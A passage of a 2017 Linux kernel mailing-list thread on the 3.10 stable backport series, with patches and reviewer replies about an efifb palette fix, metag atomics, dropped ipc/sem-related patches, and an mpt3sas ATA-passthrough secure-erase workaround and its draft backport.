-		red   >>= 8;
-		green >>= 8;
-		blue  >>= 8;
+		red   >>= 16 - info->var.red.length;
+		green >>= 16 - info->var.green.length;
+		blue  >>= 16 - info->var.blue.length;
 		((u32 *)(info->pseudo_palette))[regno] =
 			(red   << info->var.red.offset)   |
 			(green << info->var.green.offset) |
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 319/319] metag: Only define atomic_dec_if_positive conditionally
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (217 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 318/319] fbdev/efifb: Fix 16 color palette entry calculation Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: James Hogan, Willy Tarreau

From: Guenter Roeck <linux@roeck-us.net>

commit 35d04077ad96ed33ceea2501f5a4f1eacda77218 upstream.

The definition of atomic_dec_if_positive() assumes that
atomic_sub_if_positive() exists, which is only the case if
metag specific atomics are used. This results in the following
build error when trying to build metag1_defconfig.

kernel/ucount.c: In function 'dec_ucount':
kernel/ucount.c:211: error:
	implicit declaration of function 'atomic_sub_if_positive'

Moving the definition of atomic_dec_if_positive() into the metag
conditional code fixes the problem.

Fixes: 6006c0d8ce94 ("metag: Atomics, locks and bitops")
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 arch/metag/include/asm/atomic.h | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/arch/metag/include/asm/atomic.h b/arch/metag/include/asm/atomic.h
index 307ecd2..d7d6b9e 100644
--- a/arch/metag/include/asm/atomic.h
+++ b/arch/metag/include/asm/atomic.h
@@ -38,6 +38,7 @@
 #define atomic_dec(v) atomic_sub(1, (v))
 
 #define atomic_inc_not_zero(v) atomic_add_unless((v), 1, 0)
+#define atomic_dec_if_positive(v)       atomic_sub_if_positive(1, v)
 
 #define smp_mb__before_atomic_dec()	barrier()
 #define smp_mb__after_atomic_dec()	barrier()
@@ -46,8 +47,6 @@
 
 #endif
 
-#define atomic_dec_if_positive(v)       atomic_sub_if_positive(1, v)
-
 #include <asm-generic/atomic64.h>
 
 #endif /* __ASM_METAG_ATOMIC_H */
-- 
2.8.0.rc2.1.gbe9624a


* Re: [PATCH 3.10 275/319] ipc: remove use of seq_printf return value
  2017-02-05 19:21 ` [PATCH 3.10 275/319] ipc: remove use of seq_printf return value Willy Tarreau
@ 2017-02-05 19:49   ` Joe Perches
  2017-02-05 20:35     ` Willy Tarreau
  2017-02-06  8:06   ` Willy Tarreau
  1 sibling, 1 reply; 239+ messages in thread
From: Joe Perches @ 2017-02-05 19:49 UTC (permalink / raw)
  To: Willy Tarreau, linux-kernel, stable, linux; +Cc: Andrew Morton, Linus Torvalds

On Sun, 2017-02-05 at 20:21 +0100, Willy Tarreau wrote:
> From: Joe Perches <joe@perches.com>
> 
> commit 7f032d6ef6154868a2a5d5f6b2c3f8587292196c upstream.
> 
> The seq_printf return value, because it's frequently misused,
> will eventually be converted to void.

Is this necessary?  It doesn't seem so.

This one seems an unlikely candidate to backport as
it effectively doesn't do anything but prepare for
seq_printf return value removal.

Is that removal going to be backported too or is this
being patched to avoid some other backported patch's
desire to be applied without offsets?

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 275/319] ipc: remove use of seq_printf return value
  2017-02-05 19:49   ` Joe Perches
@ 2017-02-05 20:35     ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 20:35 UTC (permalink / raw)
  To: Joe Perches; +Cc: linux-kernel, stable, linux, Andrew Morton, Linus Torvalds

Hi Joe,

On Sun, Feb 05, 2017 at 11:49:33AM -0800, Joe Perches wrote:
> On Sun, 2017-02-05 at 20:21 +0100, Willy Tarreau wrote:
> > From: Joe Perches <joe@perches.com>
> > 
> > commit 7f032d6ef6154868a2a5d5f6b2c3f8587292196c upstream.
> > 
> > The seq_printf return value, because it's frequently misused,
> > will eventually be converted to void.
> 
> Is this necessary?  It doesn't seem so.
> 
> This one seems an unlikely candidate to backport as
> it effectively doesn't do anything but prepare for
> seq_printf return value removal.
> 
> Is that removal going to be backported too or is this
> being patched to avoid some other backported patch's
> desire to be applied without offsets?

Hmmm sorry, I missed the comment on this one. It was picked
because it makes it easier to apply "ipc/sem.c: fix
complex_count vs. simple op race". The latter was picked
as-is from Jiri's 3.12 tree so I preferred to avoid modifying
it. I'll just mention it in the commit message.

Thanks for notifying me.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt()
  2017-02-05 19:20 ` [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt() Willy Tarreau
@ 2017-02-06  5:14   ` Bart Van Assche
  2017-02-06  6:32     ` Willy Tarreau
  0 siblings, 1 reply; 239+ messages in thread
From: Bart Van Assche @ 2017-02-06  5:14 UTC (permalink / raw)
  To: linux, linux-kernel, w, stable; +Cc: sagig, dledford, nab

On Sun, 2017-02-05 at 20:20 +0100, Willy Tarreau wrote:
> From: Bart Van Assche <bart.vanassche@sandisk.com>
> 
> commit 51093254bf879bc9ce96590400a87897c7498463 upstream.
> 
> Let the target core check task existence instead of the SRP target
> driver. Additionally, let the target core check the validity of the
> task management request instead of the ib_srpt driver.
> 
> This patch fixes the following kernel crash:
> 
> BUG: unable to handle kernel NULL pointer dereference at 0000000000000001
> IP: [<ffffffffa0565f37>] srpt_handle_new_iu+0x6d7/0x790 [ib_srpt]
> Oops: 0002 [#1] SMP
> Call Trace:
>  [<ffffffffa05660ce>] srpt_process_completion+0xde/0x570 [ib_srpt]
>  [<ffffffffa056669f>] srpt_compl_thread+0x13f/0x160 [ib_srpt]
>  [<ffffffff8109726f>] kthread+0xcf/0xe0
>  [<ffffffff81613cfc>] ret_from_fork+0x7c/0xb0

Hi Willy,

The first part of the description of this patch is correct (the part about
the refactoring) but the second part is not (the part about the kernel crash).
If you are looking only for patches that fix bugs you may want to skip this
patch.

Bart.

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt()
  2017-02-06  5:14   ` Bart Van Assche
@ 2017-02-06  6:32     ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  6:32 UTC (permalink / raw)
  To: Bart Van Assche; +Cc: linux, linux-kernel, stable, sagig, dledford, nab

Hi Bart,

On Mon, Feb 06, 2017 at 05:14:04AM +0000, Bart Van Assche wrote:
> On Sun, 2017-02-05 at 20:20 +0100, Willy Tarreau wrote:
> > From: Bart Van Assche <bart.vanassche@sandisk.com>
> > 
> > commit 51093254bf879bc9ce96590400a87897c7498463 upstream.
> > 
> > Let the target core check task existence instead of the SRP target
> > driver. Additionally, let the target core check the validity of the
> > task management request instead of the ib_srpt driver.
> > 
> > This patch fixes the following kernel crash:
> > 
> > BUG: unable to handle kernel NULL pointer dereference at 0000000000000001
> > IP: [<ffffffffa0565f37>] srpt_handle_new_iu+0x6d7/0x790 [ib_srpt]
> > Oops: 0002 [#1] SMP
> > Call Trace:
> >  [<ffffffffa05660ce>] srpt_process_completion+0xde/0x570 [ib_srpt]
> >  [<ffffffffa056669f>] srpt_compl_thread+0x13f/0x160 [ib_srpt]
> >  [<ffffffff8109726f>] kthread+0xcf/0xe0
> >  [<ffffffff81613cfc>] ret_from_fork+0x7c/0xb0
> 
> Hi Willy,
> 
> The first part of the description of this patch is correct (the part about
> the refactoring) but the second part is not (the part about the kernel crash).
> If you are looking only for patches that fix bugs you may want to skip this
> patch.

OK I'm dropping it then.

Thanks!
Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 282/319] ipc/sem.c: fix complex_count vs. simple op race
  2017-02-05 19:21 ` [PATCH 3.10 282/319] ipc/sem.c: fix complex_count vs. simple op race Willy Tarreau
@ 2017-02-06  8:04   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:04 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Manfred Spraul, H. Peter Anvin, Peter Zijlstra, Davidlohr Bueso,
	Thomas Gleixner, Ingo Molnar, 1vier1, Andrew Morton,
	Linus Torvalds, Jiri Slaby

On Sun, Feb 05, 2017 at 08:21:44PM +0100, Willy Tarreau wrote:
> From: Manfred Spraul <manfred@colorfullife.com>
> 
> commit 5864a2fd3088db73d47942370d0f7210a807b9bc upstream.
> 
> Commit 6d07b68ce16a ("ipc/sem.c: optimize sem_lock()") introduced a
> race:

Finally dropped in favor of a revert of the patch above as it broke
the build on some architectures.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 281/319] compiler: Allow 1- and 2-byte smp_load_acquire() and smp_store_release()
  2017-02-05 19:21 ` [PATCH 3.10 281/319] compiler: Allow 1- and 2-byte smp_load_acquire() and smp_store_release() Willy Tarreau
@ 2017-02-06  8:05   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:05 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Paul E. McKenney, Peter Zijlstra

On Sun, Feb 05, 2017 at 08:21:43PM +0100, Willy Tarreau wrote:
> From: "Paul E. McKenney" <paulmck@linux.vnet.ibm.com>
> 
> commit 536fa402221f09633e7c5801b327055ab716a363 upstream.

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 280/319] locking: Remove atomicy checks from {READ,WRITE}_ONCE
  2017-02-05 19:21 ` [PATCH 3.10 280/319] locking: Remove atomicy checks from {READ,WRITE}_ONCE Willy Tarreau
@ 2017-02-06  8:05   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:05 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Peter Zijlstra, Davidlohr Bueso, H . Peter Anvin, Paul McKenney,
	Stephen Rothwell, Thomas Gleixner, Ingo Molnar

On Sun, Feb 05, 2017 at 08:21:42PM +0100, Willy Tarreau wrote:
> From: Peter Zijlstra <peterz@infradead.org>
> 
> commit 7bd3e239d6c6d1cad276e8f130b386df4234dcd7 upstream.

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 279/319] kernel: make READ_ONCE() valid on const arguments
  2017-02-05 19:21 ` [PATCH 3.10 279/319] kernel: make READ_ONCE() valid on const arguments Willy Tarreau
@ 2017-02-06  8:05   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:05 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Linus Torvalds, Christian Borntraeger

On Sun, Feb 05, 2017 at 08:21:41PM +0100, Willy Tarreau wrote:
> From: Linus Torvalds <torvalds@linux-foundation.org>
> 
> commit dd36929720f40f17685e841ae0d4c581c165ea60 upstream.

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 278/319] kernel: Change ASSIGN_ONCE(val, x) to WRITE_ONCE(x, val)
  2017-02-05 19:21 ` [PATCH 3.10 278/319] kernel: Change ASSIGN_ONCE(val, x) to WRITE_ONCE(x, val) Willy Tarreau
@ 2017-02-06  8:06   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:06 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Christian Borntraeger

On Sun, Feb 05, 2017 at 08:21:40PM +0100, Willy Tarreau wrote:
> From: Christian Borntraeger <borntraeger@de.ibm.com>
> 
> commit 43239cbe79fc369f5d2160bd7f69e28b5c50a58c upstream.

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 277/319] kernel: Provide READ_ONCE and ASSIGN_ONCE
  2017-02-05 19:21 ` [PATCH 3.10 277/319] kernel: Provide READ_ONCE and ASSIGN_ONCE Willy Tarreau
@ 2017-02-06  8:06   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:06 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Christian Borntraeger

On Sun, Feb 05, 2017 at 08:21:39PM +0100, Willy Tarreau wrote:
> From: Christian Borntraeger <borntraeger@de.ibm.com>
> 
> commit 230fa253df6352af12ad0a16128760b5cb3f92df upstream.

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 276/319] arch: Introduce smp_load_acquire(), smp_store_release()
  2017-02-05 19:21 ` [PATCH 3.10 276/319] arch: Introduce smp_load_acquire(), smp_store_release() Willy Tarreau
@ 2017-02-06  8:06   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:06 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Peter Zijlstra, Benjamin Herrenschmidt, Frederic Weisbecker,
	Mathieu Desnoyers, Michael Ellerman, Michael Neuling,
	Russell King, Geert Uytterhoeven, Heiko Carstens, Linus Torvalds,
	Martin Schwidefsky, Victor Kaplansky, Tony Luck, Oleg Nesterov,
	Ingo Molnar

On Sun, Feb 05, 2017 at 08:21:38PM +0100, Willy Tarreau wrote:
> From: Peter Zijlstra <peterz@infradead.org>
> 
> commit 47933ad41a86a4a9b50bed7c9b9bd2ba242aac63 upstream

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 275/319] ipc: remove use of seq_printf return value
  2017-02-05 19:21 ` [PATCH 3.10 275/319] ipc: remove use of seq_printf return value Willy Tarreau
  2017-02-05 19:49   ` Joe Perches
@ 2017-02-06  8:06   ` Willy Tarreau
  1 sibling, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:06 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Joe Perches, Andrew Morton, Linus Torvalds

On Sun, Feb 05, 2017 at 08:21:37PM +0100, Willy Tarreau wrote:
> From: Joe Perches <joe@perches.com>
> 
> commit 7f032d6ef6154868a2a5d5f6b2c3f8587292196c upstream.

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* RE: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-05 19:19 ` [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination Willy Tarreau
@ 2017-02-06 16:21   ` Sathya Prakash Veerichetty
  2017-02-06 22:26     ` Willy Tarreau
  0 siblings, 1 reply; 239+ messages in thread
From: Sathya Prakash Veerichetty @ 2017-02-06 16:21 UTC (permalink / raw)
  To: Willy Tarreau, linux-kernel, stable, linux
  Cc: Andrey Grodzovsky, linux-scsi, Chaitra Basappa,
	Suganath Prabu Subramani, Sreekanth Reddy, Hannes Reinecke,
	Martin K . Petersen

Willy,
I think this patch had a problem and was later modified to a different
blocking mechanism.  Could you please pull in the latest change for this?

Thanks
Sathya

-----Original Message-----
From: Willy Tarreau [mailto:w@1wt.eu]
Sent: Sunday, February 05, 2017 12:19 PM
To: linux-kernel@vger.kernel.org; stable@vger.kernel.org;
linux@roeck-us.net
Cc: Andrey Grodzovsky; linux-scsi@vger.kernel.org; Sathya Prakash; Chaitra
P B; Suganath Prabu Subramani; Sreekanth Reddy; Hannes Reinecke; Martin K
. Petersen; Willy Tarreau
Subject: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature
termination

From: Andrey Grodzovsky <andrey2805@gmail.com>

commit 18f6084a989ba1b38702f9af37a2e4049a924be6 upstream.

This is a work around for a bug with LSI Fusion MPT SAS2 when performing
secure erase. Due to the very long time the operation takes, commands
issued during the erase will time out and will trigger execution of the
abort hook. Even though the abort hook is called for the specific command
which timed out, this leads to entire device halt (scsi_state terminated)
and premature termination of the secure erase.

Set device state to busy while ATA passthrough commands are in progress.

[mkp: hand applied to 4.9/scsi-fixes, tweaked patch description]

Signed-off-by: Andrey Grodzovsky <andrey2805@gmail.com>
Acked-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: <linux-scsi@vger.kernel.org>
Cc: Sathya Prakash <sathya.prakash@broadcom.com>
Cc: Chaitra P B <chaitra.basappa@broadcom.com>
Cc: Suganath Prabu Subramani <suganath-prabu.subramani@broadcom.com>
Cc: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: Hannes Reinecke <hare@suse.de>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/mpt3sas/mpt3sas_scsih.c | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
index f8c4b85..e414b71 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
@@ -3515,6 +3515,10 @@ _scsih_eedp_error_handling(struct scsi_cmnd *scmd, u16 ioc_status)
 	    SAM_STAT_CHECK_CONDITION;
 }
 
+static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd)
+{
+	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16);
+}
 
 /**
  * _scsih_qcmd_lck - main scsi request entry point
@@ -3543,6 +3547,13 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 		scsi_print_command(scmd);
 #endif

+	/*
+	 * Lock the device for any subsequent command until command is
+	 * done.
+	 */
+	if (ata_12_16_cmd(scmd))
+		scsi_internal_device_block(scmd->device);
+
 	scmd->scsi_done = done;
 	sas_device_priv_data = scmd->device->hostdata;
 	if (!sas_device_priv_data || !sas_device_priv_data->sas_target) {
@@ -4046,6 +4057,9 @@ _scsih_io_done(struct MPT3SAS_ADAPTER *ioc, u16 smid, u8 msix_index, u32 reply)
 	if (scmd == NULL)
 		return 1;

+	if (ata_12_16_cmd(scmd))
+		scsi_internal_device_unblock(scmd->device, SDEV_RUNNING);
+
 	mpi_request = mpt3sas_base_get_msg_frame(ioc, smid);

 	if (mpi_reply == NULL) {
--
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-06 16:21   ` Sathya Prakash Veerichetty
@ 2017-02-06 22:26     ` Willy Tarreau
  2017-02-07  6:38       ` James Bottomley
  0 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06 22:26 UTC (permalink / raw)
  To: Sathya Prakash Veerichetty
  Cc: linux-kernel, stable, linux, Andrey Grodzovsky, linux-scsi,
	Chaitra Basappa, Suganath Prabu Subramani, Sreekanth Reddy,
	Hannes Reinecke, Martin K . Petersen

Hi Sathya,

On Mon, Feb 06, 2017 at 09:21:44AM -0700, Sathya Prakash Veerichetty wrote:
> Willy,
> I think this patch had a problem and was later modified to a different
> blocking mechanism.  Could you please pull in the latest change for this?

Much appreciated, thanks. I've checked and found the patch you're
talking about :

  commit ffb58456589443ca572221fabbdef3db8483a779
  Author: James Bottomley <James.Bottomley@HansenPartnership.com>
  Date:   Sun Jan 1 09:39:24 2017 -0800

    scsi: mpt3sas: fix hang on ata passthrough commands
    
    mpt3sas has a firmware failure where it can only handle one pass through
    ATA command at a time.  If another comes in, contrary to the SAT
    standard, it will hang until the first one completes (causing long
    commands like secure erase to timeout).  The original fix was to block
    the device when an ATA command came in, but this caused a regression
    with
    
    commit 669f044170d8933c3d66d231b69ea97cb8447338
    Author: Bart Van Assche <bart.vanassche@sandisk.com>
    Date:   Tue Nov 22 16:17:13 2016 -0800
    
        scsi: srp_transport: Move queuecommand() wait code to SCSI core
    
    So fix the original fix of the secure erase timeout by properly
    returning SAM_STAT_BUSY like the SAT recommends.  The original patch
    also had a concurrency problem since scsih_qcmd is lockless at that
    point (this is fixed by using atomic bitops to set and test the flag).
    
    [mkp: addressed feedback wrt. test_bit and fixed whitespace]
    
    Fixes: 18f6084a989ba1b (mpt3sas: Fix secure erase premature termination)
    Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
    Acked-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
    Reviewed-by: Christoph Hellwig <hch@lst.de>
    Reported-by: Ingo Molnar <mingo@kernel.org>
    Tested-by: Ingo Molnar <mingo@kernel.org>
    Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>

We don't have the referenced commit above in 3.10 so we should be safe.
Additionally I checked that neither 4.4 nor 3.12 have them either, so
that makes me feel confident that we can skip it in 3.10 as well.

Thanks!
Willy
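
For readers following the thread, the approach described in the commit
message quoted above (return BUSY while one ATA passthrough is outstanding,
and claim the "pending" flag with an atomic test-and-set because the queue
path is lockless) can be sketched in plain userspace C. This is only an
illustration under stated assumptions: struct dev_state, submit_cmd() and
complete_cmd() are hypothetical names, C11 atomics stand in for the kernel's
test_bit()/test_and_set_bit()/clear_bit(), and the driver's retry loop is
folded into a single exchange. It is not the driver code.

```c
#include <stdatomic.h>
#include <stdbool.h>

/* Hypothetical stand-in for the per-device private data. */
struct dev_state {
	atomic_bool ata_pending;	/* true while one ATA passthrough is in flight */
};

/* Hypothetical result codes; SUBMIT_BUSY plays the role of SAM_STAT_BUSY. */
enum submit_result { SUBMIT_QUEUED, SUBMIT_BUSY };

/*
 * Lockless submit path. Ordinary commands only observe the flag.
 * A passthrough command must claim it atomically: atomic_exchange()
 * returns the previous value, so "true" means another submitter
 * already owns the device and this command is bounced with BUSY.
 */
static enum submit_result submit_cmd(struct dev_state *dev, bool is_ata_passthrough)
{
	if (!is_ata_passthrough)
		return atomic_load(&dev->ata_pending) ? SUBMIT_BUSY : SUBMIT_QUEUED;

	if (atomic_exchange(&dev->ata_pending, true))
		return SUBMIT_BUSY;

	return SUBMIT_QUEUED;
}

/* Completion path: only a passthrough command releases the flag. */
static void complete_cmd(struct dev_state *dev, bool is_ata_passthrough)
{
	if (is_ata_passthrough)
		atomic_store(&dev->ata_pending, false);
}
```

Compared with blocking the whole device, nothing here can be left stuck by
a separate block/unblock pair going out of sync: a second command arriving
during a long passthrough is simply bounced and left to the caller to retry.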

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-06 22:26     ` Willy Tarreau
@ 2017-02-07  6:38       ` James Bottomley
  2017-02-07  6:59         ` Willy Tarreau
  0 siblings, 1 reply; 239+ messages in thread
From: James Bottomley @ 2017-02-07  6:38 UTC (permalink / raw)
  To: Willy Tarreau, Sathya Prakash Veerichetty
  Cc: linux-kernel, stable, linux, Andrey Grodzovsky, linux-scsi,
	Chaitra Basappa, Suganath Prabu Subramani, Sreekanth Reddy,
	Hannes Reinecke, Martin K . Petersen

On Mon, 2017-02-06 at 23:26 +0100, Willy Tarreau wrote:
> Hi Sathya,
> 
> On Mon, Feb 06, 2017 at 09:21:44AM -0700, Sathya Prakash Veerichetty
> wrote:
> > Willy,
> > I think this patch had a problem and was later modified to a different
> > blocking mechanism.  Could you please pull in the latest change for
> > this?
> 
> Much appreciated, thanks. I've checked and found the patch you're
> talking about :
> 
>   commit ffb58456589443ca572221fabbdef3db8483a779
>   Author: James Bottomley <James.Bottomley@HansenPartnership.com>
>   Date:   Sun Jan 1 09:39:24 2017 -0800
> 
>     scsi: mpt3sas: fix hang on ata passthrough commands
>     
>     mpt3sas has a firmware failure where it can only handle one pass
> through
>     ATA command at a time.  If another comes in, contrary to the SAT
>     standard, it will hang until the first one completes (causing
> long
>     commands like secure erase to timeout).  The original fix was to
> block
>     the device when an ATA command came in, but this caused a
> regression
>     with
>     
>     commit 669f044170d8933c3d66d231b69ea97cb8447338
>     Author: Bart Van Assche <bart.vanassche@sandisk.com>
>     Date:   Tue Nov 22 16:17:13 2016 -0800
>     
>         scsi: srp_transport: Move queuecommand() wait code to SCSI
> core
>     
>     So fix the original fix of the secure erase timeout by properly
>     returning SAM_STAT_BUSY like the SAT recommends.  The original
> patch
>     also had a concurrency problem since scsih_qcmd is lockless at
> that
>     point (this is fixed by using atomic bitops to set and test the
> flag).
>     
>     [mkp: addressed feedback wrt. test_bit and fixed whitespace]
>     
>     Fixes: 18f6084a989ba1b (mpt3sas: Fix secure erase premature
> termination)
>     Signed-off-by: James Bottomley <
> James.Bottomley@HansenPartnership.com>
>     Acked-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
>     Reviewed-by: Christoph Hellwig <hch@lst.de>
>     Reported-by: Ingo Molnar <mingo@kernel.org>
>     Tested-by: Ingo Molnar <mingo@kernel.org>
>     Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
> 
> We don't have the referenced commit above in 3.10 so we should be 
> safe. Additionally I checked that neither 4.4 nor 3.12 have them 
> either, so that makes me feel confident that we can skip it in 3.10
> as well.

The original was also racy with respect to multiple commands, so the
above fixed the race as well.

James

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-07  6:38       ` James Bottomley
@ 2017-02-07  6:59         ` Willy Tarreau
  2017-02-07 17:02           ` James Bottomley
  0 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-07  6:59 UTC (permalink / raw)
  To: James Bottomley
  Cc: Sathya Prakash Veerichetty, linux-kernel, stable, linux,
	Andrey Grodzovsky, linux-scsi, Chaitra Basappa,
	Suganath Prabu Subramani, Sreekanth Reddy, Hannes Reinecke,
	Martin K . Petersen

Hi James,

On Mon, Feb 06, 2017 at 10:38:48PM -0800, James Bottomley wrote:
> On Mon, 2017-02-06 at 23:26 +0100, Willy Tarreau wrote:
(...)
> > We don't have the referenced commit above in 3.10 so we should be 
> > safe. Additionally I checked that neither 4.4 nor 3.12 have them 
> > either, so that makes me feel confident that we can skip it in 3.10
> > as well.
> 
> The original was also racy with respect to multiple commands, so the
> above fixed the race as well.

OK so I tried to backport it to 3.10. I dropped a few parts which were
addressing this one marked for stable 4.4+ :
    7ff723a ("scsi: mpt3sas: Unblock device after controller reset")

And I got the attached patch. All I know is that it builds. I'd appreciate
it if someone could confirm its validity, in which case I'll add it.

Thanks,
Willy

---

diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.h b/drivers/scsi/mpt3sas/mpt3sas_base.h
index 994656c..997e13f 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_base.h
+++ b/drivers/scsi/mpt3sas/mpt3sas_base.h
@@ -219,6 +219,7 @@ struct MPT3SAS_TARGET {
  * @eedp_enable: eedp support enable bit
  * @eedp_type: 0(type_1), 1(type_2), 2(type_3)
  * @eedp_block_length: block size
+ * @ata_command_pending: SATL passthrough outstanding for device
  */
 struct MPT3SAS_DEVICE {
 	struct MPT3SAS_TARGET *sas_target;
@@ -227,6 +228,17 @@ struct MPT3SAS_DEVICE {
 	u8	configured_lun;
 	u8	block;
 	u8	tlr_snoop_check;
+	/*
+	 * Bug workaround for SATL handling: the mpt2/3sas firmware
+	 * doesn't return BUSY or TASK_SET_FULL for subsequent
+	 * commands while a SATL pass through is in operation as the
+	 * spec requires, it simply does nothing with them until the
+	 * pass through completes, causing them possibly to timeout if
+	 * the passthrough is a long executing command (like format or
+	 * secure erase).  This variable allows us to do the right
+	 * thing while a SATL command is pending.
+	 */
+	unsigned long ata_command_pending;
 };
 
 #define MPT3_CMD_NOT_USED	0x8000	/* free */
diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
index e414b71..db38f70 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
@@ -3515,9 +3515,18 @@ _scsih_eedp_error_handling(struct scsi_cmnd *scmd, u16 ioc_status)
 	    SAM_STAT_CHECK_CONDITION;
 }
 
-static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd)
+static int _scsih_set_satl_pending(struct scsi_cmnd *scmd, bool pending)
 {
-	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16);
+	struct MPT3SAS_DEVICE *priv = scmd->device->hostdata;
+
+	if (scmd->cmnd[0] != ATA_12 && scmd->cmnd[0] != ATA_16)
+		return 0;
+
+	if (pending)
+		return test_and_set_bit(0, &priv->ata_command_pending);
+
+	clear_bit(0, &priv->ata_command_pending);
+	return 0;
 }
 
 /**
@@ -3547,13 +3556,6 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 		scsi_print_command(scmd);
 #endif
 
-	/*
-	 * Lock the device for any subsequent command until command is
-	 * done.
-	 */
-	if (ata_12_16_cmd(scmd))
-		scsi_internal_device_block(scmd->device);
-
 	scmd->scsi_done = done;
 	sas_device_priv_data = scmd->device->hostdata;
 	if (!sas_device_priv_data || !sas_device_priv_data->sas_target) {
